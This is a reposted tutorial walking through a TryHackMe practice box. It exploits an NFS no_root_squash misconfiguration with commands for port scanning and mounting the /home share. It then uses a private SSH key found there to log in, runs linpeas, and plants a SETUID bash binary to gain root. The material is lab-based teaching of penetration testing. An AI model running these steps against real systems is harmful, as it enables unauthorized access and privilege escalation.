[Tut] Hacking Network File System (NFS) – A TryHackMe Walkthrough - Printable Version +- Sick Gaming (https://www.sickgaming.net) +-- Forum: Programming (https://www.sickgaming.net/forum-76.html) +--- Forum: Python (https://www.sickgaming.net/forum-83.html) +--- Thread: [Tut] Hacking Network File System (NFS) – A TryHackMe Walkthrough (/thread-100541.html) |
[Tut] Hacking Network File System (NFS) – A TryHackMe Walkthrough - xSicKxBot - 01-08-2023 Hacking Network File System (NFS) – A TryHackMe Walkthrough <div> <div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1041581","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'> <div class="kksr-stars"> <div class="kksr-stars-inactive"> <div class="kksr-star" data-star="1" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="2" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="3" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="4" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="5" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> </p></div> <div class="kksr-stars-active" style="width: 142.5px;"> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> </p></div> </div> <div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div> </p></div> <figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/hacking-network-file-system-nfs-a-tryhackme-walkthrough/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FApudHe1bAVQ%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure> <h2>OBJECTIVE</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="852" height="567" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-34.png" alt="" class="wp-image-1041658" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-34.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-34-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-34-768x511.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure> </div> <p>NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows/Linux/Mac). </p> <p>In <a href="https://tryhackme.com/room/networkservices2" target="_blank" rel="noreferrer noopener">this practice box</a> from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final <code>root.txt</code> flag.</p> <h2>WHAT IS NO-ROOT SQUASH?</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="568" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-35.png" alt="" class="wp-image-1041662" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-35.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-35-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-35-768x512.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure> </div> <p><strong>No-root Squash</strong> is an uncommon configuration (some might say a misconfiguration) on the NFS file system. </p> <p>When enabled, it allows remote users to change file permissions on any file and also to add a <code>SETUID</code> bit to effectively run programs as the root user. Normally it is disabled to protect against hackers, and all root-created files are assigned to an unprivileged owner named <code>nfsnobody</code>.</p> <p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Recommended</strong>: If you are interested in learning more technical details about how this works, I’d recommend <a rel="noreferrer noopener" href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/s2-server-nfs-noroot" target="_blank">this article</a> on <code>no_root_squash</code> and other configuration options when using NFS.</p> <h2>ENUMERATION</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="548" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-36.png" alt="" class="wp-image-1041663" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-36.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-36-300x193.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-36-768x494.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure> </div> <p>We’ll start with a standard Nmap scan of all ports with the <code>-p-</code> flag:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nmap $targetIP -p-</pre> <p>The scan shows an <code>nfs</code> service running on port. Let’s find out what directories are mountable with the command:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">showmount -e $targetIP</pre> <p>(<code>-e</code> for exports)</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="523" height="388" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-29.png" alt="" class="wp-image-1041590" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-29.png 523w, https://blog.finxter.com/wp-content/uploads/2023/01/image-29-300x223.png 300w" sizes="(max-width: 523px) 100vw, 523px" /></figure> </div> <p>Let’s go ahead and mount the <code>/home</code> directory to our target machine. I’m using Parrot OS virtual machine with a Mate desktop environment running in Gnome Boxes. We can mount the <code>nfs</code> directory directly to our local filesystem with the command:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">mount -t nfs $targetIP:/home /mount</pre> <p>(<code>-t</code> indicates filetype) </p> <p>And now we can continue further enumeration by poking around the filesystem.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cd /mount ls -la </pre> <p>We find a user folder in the home directory, <code>cappuccino</code> and a hidden directory <code>.ssh</code>. Inside the directory there is an <code>id_rsa</code> file that holds a private ssh key.</p> <h2>INITIAL FOOTHOLD – USER CAPPUCCINO </h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="568" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-37.png" alt="" class="wp-image-1041665" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-37.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-37-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-37-768x512.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure> </div> <p>After copying the <code>id_rsa</code> over to our target machine, we can ssh into cappuccino’s account with this command:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -i id_rsa cappuccino@$targetIP</pre> <h2>ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="567" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-38.png" alt="" class="wp-image-1041666" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-38.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-38-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-38-768x511.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure> </div> <p>Now that we have our initial foothold, we can grab a copy of the well-known script <code>linpeas.sh</code> from <a rel="noreferrer noopener" href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" target="_blank">the official git repo</a> and use it to automate the enumeration of attack vectors for privilege escalation on the target machine. We’ll navigate to the <code>/mount</code> folder and use the command <code>wget</code> on our attack machine for this:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh </pre> <p>Before running the sh program from our target machine, we need to add execute permissions to the file from our attack machine. </p> <p><em>The beauty of mounting NFS file systems in Linux is evident here as we can easily add permissions to <code>linpeas.sh</code> from our attack machine to set up the program to be executable on the target machine</em>.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">chmod +x linpeas.sh</pre> <p>Now that <code>linpeas.sh</code> is located in the <code>/home</code> folder of the target machine, we can run it to start the automated enumeration:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./linpeas.sh</pre> <p>This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text. </p> <p>Scrolling through the results, we quickly find the <code>no_root_squash</code> listed under NFS. We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="935" height="380" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-30.png" alt="" class="wp-image-1041591" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-30.png 935w, https://blog.finxter.com/wp-content/uploads/2023/01/image-30-300x122.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-30-768x312.png 768w" sizes="(max-width: 935px) 100vw, 935px" /></figure> </div> <h2>EXPLOITING NO_ROOT_SQUASH</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="567" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-39.png" alt="" class="wp-image-1041668" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-39.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-39-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-39-768x511.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure> </div> <p>First, let’s grab the bash executable for Ubuntu Server 18.04 from the <a rel="noreferrer noopener" href="https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash" target="_blank">link</a> on TryHackMe.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Sudo wget https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash</pre> <p>Now we add the <code>SETUID</code> bit to the file bash and make it executable. This is the key to gaining root access with <code>no_root_squash</code>.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo chmod +sx bash</pre> <p>Running bash now from our target machine doesn’t seem to change us to the root user yet.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./bash</pre> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="666" height="239" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-31.png" alt="" class="wp-image-1041592" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-31.png 666w, https://blog.finxter.com/wp-content/uploads/2023/01/image-31-300x108.png 300w" sizes="(max-width: 666px) 100vw, 666px" /></figure> </div> <p>The final trick we need to use is to enable persistence mode with the flag <code>-p</code></p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="366" height="136" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-32.png" alt="" class="wp-image-1041594" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-32.png 366w, https://blog.finxter.com/wp-content/uploads/2023/01/image-32-300x111.png 300w" sizes="(max-width: 366px) 100vw, 366px" /></figure> </div> <p>If you liked this tutorial, you’d probably love my video walkthrough as well:</p> <p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Recommended Tutorial</strong>: <a rel="noreferrer noopener" href="https://blog.finxter.com/tryhackme-walkthrough-wonderland/" data-type="post" data-id="892288" target="_blank">Alice in Wonderland — TryHackMe</a></p> </div> https://www.sickgaming.net/blog/2023/01/07/hacking-network-file-system-nfs-a-tryhackme-walkthrough/ |